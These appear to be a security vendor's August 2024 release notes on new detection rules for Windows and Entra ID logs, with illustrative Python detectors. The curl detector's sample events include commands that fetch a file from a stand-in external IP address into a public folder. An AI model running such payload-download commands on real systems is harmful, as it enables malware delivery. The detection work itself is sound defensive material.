
August 2024 Product Release Notes

Written by Faith Bradley | Sep 17, 2024 7:07:07 PM

Summary

In August, we released new detection rules for Windows and Entra logs, and we updated the way we allocate Blumira Agents in Managed Service Provider (MSP) accounts with eligible licenses.

Feature and Platform Updates

  • MSP Agent Limits: MSPs with current contracts that do not include any legacy editions (i.e., Cloud or Advanced) now automatically receive two agents per user in the app for sub-accounts on XDR or SIEM+ editions. Sub-accounts on M365 Edition now get 5 agents to experience extended observability and detections for remote endpoints. With our August release, managing limits for Blumira Agent is as easy as updating the user count of the organization from the MSP Portal. We update the maximum agent count automatically, removing the need for partners to manually increase and keep track of the number of agents used by each account. MSP partners can find more details in MSP pricing.

Detection Updates

Log Type / Detection Details

Windows or Blumira Agent Endpoint

NEW - Generic Locker PowerShell Module

This new P1 Threat detection rule triggers an alert when a Windows device logs activity that matches behavior associated with a script known to be used by threat actors to deploy various ransomware variants.

Windows or Blumira Agent Endpoint

NEW - File Download from IP URL via Curl.EXE

This new P1 Suspect detection rule triggers when a user is seen using a Curl command to download files from an external IP address. Findings include the command used for the download.

Curl is a command line tool that is most commonly used to transfer data to and from a server. While it is a useful tool for administrators and developers, it is also used by threat actors to download malicious files and applications from their attack infrastructure. Curl is packaged by default with Windows 10 and higher.
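The following is an added illustration of the matching logic such a rule needs; it is example code written for these notes, not Blumira's rule or detection engine. It assumes a generic process-creation event with host, user, image and cmdline fields (assumed names, not Blumira's schema), treats RFC 1918, loopback and link-local ranges as internal, and uses documentation addresses as stand-ins for external hosts. It goes slightly beyond the rule text by also handling bracketed IPv6 literals in the URL.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed process-creation events in a generic shape. The field names (host, user,
# image, cmdline) are assumptions for this example, not Blumira's log schema. The
# addresses are RFC 5737 / RFC 3849 documentation ranges standing in for external hosts.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": r"CORP\alice",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -s http://203.0.113.7/update.bin -o C:\Users\Public\update.bin"},
    {"host": "WS02", "user": r"CORP\bob",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe https://www.example.com/index.html"},
    {"host": "WS03", "user": r"CORP\carol",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl -k https://10.0.0.5:8443/health"},
    {"host": "WS04", "user": r"CORP\dave",
     "image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "cmdline": "msedge.exe http://203.0.113.7/"},
    {"host": "WS05", "user": r"CORP\erin",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -O http://[2001:db8::1]/tools.zip"},
]

# Address ranges treated as internal; a URL pointing at one of these is not an "external IP".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]

URL_RE = re.compile(r"""(?:https?|ftp)://[^\s"'<>]+""", re.IGNORECASE)


def is_curl(image: str) -> bool:
    """True when the process image's base name is curl.exe (any path, any case)."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower() == "curl.exe"


def external_ip_literal(host: str):
    """Return the address when host is an IP literal outside INTERNAL_NETS, else None."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None  # a DNS name, not an IP literal
    if any(ip in net for net in INTERNAL_NETS):
        return None
    return ip


def ip_literal_urls(cmdline: str) -> list:
    """URLs in the command line whose host part is an external IP literal (v4 or v6)."""
    hits = []
    for url in URL_RE.findall(cmdline):
        url = url.rstrip(".,;)")
        try:
            host = urlparse(url).hostname  # strips the [] around IPv6 literals
        except ValueError:
            continue
        if host and external_ip_literal(host) is not None:
            hits.append(url)
    return hits


def detect_curl_ip_downloads(events: list) -> list:
    """Findings for curl.exe executions that fetch from an external IP-literal URL.
    Each finding carries the full command line, as the rule's evidence does."""
    findings = []
    for ev in events:
        if not is_curl(ev.get("image", "")):
            continue
        urls = ip_literal_urls(ev.get("cmdline", ""))
        if urls:
            findings.append({"host": ev["host"], "user": ev["user"],
                             "urls": urls, "cmdline": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in detect_curl_ip_downloads(SAMPLE_EVENTS):
        print(f"{f['host']} {f['user']}: {f['urls']} <- {f['cmdline']}")
```

Only WS01 and WS05 produce findings: WS02 fetches a DNS name, WS03 fetches an internal address, and WS04 is not curl. Matching on the image base name rather than the first token of the command line matters, because the command line is attacker-controlled text while the image path comes from the process-creation event itself.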

Windows

NEW - Excessive MSSQL Login Failures

This new P2 Suspect detection rule is disabled by default, so it needs to be enabled by an administrator.

This rule triggers an alert when a device logs 30 or more failed logins against an MSSQL service on the device within a 1-hour window. This could indicate an attempted brute force attack or a misconfigured service account using incorrect or expired credentials.

Office365 AAD

Deprecated - Azure: AD Global Admin Role Assignment

This legacy detection rule was deprecated and replaced by the two new Entra ID rules described below.

Office365 AAD and Azure Directory Audit

NEW - Azure: Entra ID Global Admin Role Assignment

This new detection rule is a revised version of the deprecated “Azure: AD Global Admin Role Assignment” rule. It is a P1 Suspect rule that is enabled by default when deployed. This rule triggers an alert when a user or group in your Entra ID Directory is assigned a Global Administrator Role.

This detection rule excludes assignments done by Privileged Identity Management (PIM) and Granular Delegated Admin Permissions (GDAP).

Office365 AAD and Azure Directory Audit

NEW - Azure: Entra ID Global Admin Role Assignment by PIM/GDA

This new P3 Suspect detection rule is disabled by default, so it needs to be enabled by an administrator.

This rule triggers an alert when either Privileged Identity Management or Granular Delegated Admin Permissions (GDAP) assigns a Global Administrator Role to a user or group in your Entra ID Directory.
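The two Entra ID rules above split one event class, Global Administrator assignments, by who initiated the change. The block below is an added example (written for these notes, not Blumira's code) of that classification over audit records shaped loosely like Microsoft Graph directoryAudit objects. The records are constructed; the PIM indicator (the PIM service as loggedByService) and the GDAP indicator (a placeholder partner application as the initiating app) are assumptions of this example, chosen to show where each exclusion hooks in.

```python
import json

GLOBAL_ADMIN = "Global Administrator"

# Assumed indicators for this example. Real Entra audit records carry more detail;
# the values below are placeholders that mark where each exclusion would be evaluated.
PIM_SERVICES = {"PIM"}                                   # loggedByService for PIM-driven changes
GDAP_INITIATOR_APPS = {"GDAP-PARTNER-APP-PLACEHOLDER"}   # initiating app for GDAP-driven changes

# Constructed audit records, loosely shaped like Microsoft Graph directoryAudit objects.
GA = {"displayName": "Role.DisplayName", "newValue": "\"Global Administrator\""}
SAMPLE_RECORDS = [
    {"id": "r1", "category": "RoleManagement", "activityDisplayName": "Add member to role",
     "loggedByService": "Core Directory",
     "initiatedBy": {"user": {"userPrincipalName": "admin@example.com"}},
     "targetResources": [{"type": "User", "userPrincipalName": "newadmin@example.com",
                          "modifiedProperties": [GA]}]},
    {"id": "r2", "category": "RoleManagement",
     "activityDisplayName": "Add member to role completed (PIM activation)",
     "loggedByService": "PIM",
     "initiatedBy": {"user": {"userPrincipalName": "oncall@example.com"}},
     "targetResources": [{"type": "User", "userPrincipalName": "oncall@example.com",
                          "modifiedProperties": [GA]}]},
    {"id": "r3", "category": "RoleManagement", "activityDisplayName": "Add member to role",
     "loggedByService": "Core Directory",
     "initiatedBy": {"app": {"displayName": "GDAP-PARTNER-APP-PLACEHOLDER"}},
     "targetResources": [{"type": "Group", "displayName": "Partner Tier-0 Admins",
                          "modifiedProperties": [GA]}]},
    {"id": "r4", "category": "RoleManagement", "activityDisplayName": "Add member to role",
     "loggedByService": "Core Directory",
     "initiatedBy": {"user": {"userPrincipalName": "admin@example.com"}},
     "targetResources": [{"type": "User", "userPrincipalName": "reader@example.com",
                          "modifiedProperties": [{"displayName": "Role.DisplayName",
                                                  "newValue": "\"Security Reader\""}]}]},
]


def assigned_roles(record: dict) -> list:
    """Role display names granted by this record (Role.DisplayName modified properties)."""
    roles = []
    for target in record.get("targetResources", []):
        for prop in target.get("modifiedProperties", []):
            if prop.get("displayName") == "Role.DisplayName" and prop.get("newValue"):
                try:
                    roles.append(json.loads(prop["newValue"]))  # newValue is a JSON-encoded string
                except ValueError:
                    roles.append(prop["newValue"].strip('"'))
    return roles


def initiator_name(record: dict):
    """UPN of the initiating user, or display name of the initiating application."""
    by = record.get("initiatedBy", {})
    if by.get("user"):
        return by["user"].get("userPrincipalName")
    if by.get("app"):
        return by["app"].get("displayName")
    return None


def classify_assignment(record: dict):
    """'direct', 'pim' or 'gdap' for a Global Administrator assignment; None otherwise."""
    if record.get("category") != "RoleManagement":
        return None
    if not record.get("activityDisplayName", "").startswith("Add member to role"):
        return None
    if GLOBAL_ADMIN not in assigned_roles(record):
        return None
    if record.get("loggedByService") in PIM_SERVICES:
        return "pim"
    if initiator_name(record) in GDAP_INITIATOR_APPS:
        return "gdap"
    return "direct"


def detect_global_admin_assignments(records: list):
    """Split findings the way the two rules do: direct assignments (P1) versus
    PIM/GDAP-driven assignments (P3, disabled by default in the product)."""
    p1, p3 = [], []
    for rec in records:
        kind = classify_assignment(rec)
        if kind is None:
            continue
        targets = [t.get("userPrincipalName") or t.get("displayName")
                   for t in rec.get("targetResources", [])]
        finding = {"id": rec["id"], "source": kind, "targets": targets,
                   "initiator": initiator_name(rec)}
        (p1 if kind == "direct" else p3).append(finding)
    return p1, p3


if __name__ == "__main__":
    p1, p3 = detect_global_admin_assignments(SAMPLE_RECORDS)
    print("P1 direct assignments:", p1)
    print("P3 PIM/GDAP assignments:", p3)
```

Both user and group targets are covered, matching the rule text ("a user or group"), and r4 shows that the role name, not the activity type alone, decides whether the record matters. Keeping the PIM and GDAP assignments as a separate, lower-priority stream rather than dropping them preserves the audit trail for environments that want to review every path to Global Administrator.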

Multi-source

Reconnaissance via Net Commands

Findings for this detection now include the parent.cmdline field in matched evidence when it exists in the log data.

July Release Notes

In case you missed the July updates, you can find and review those notes here.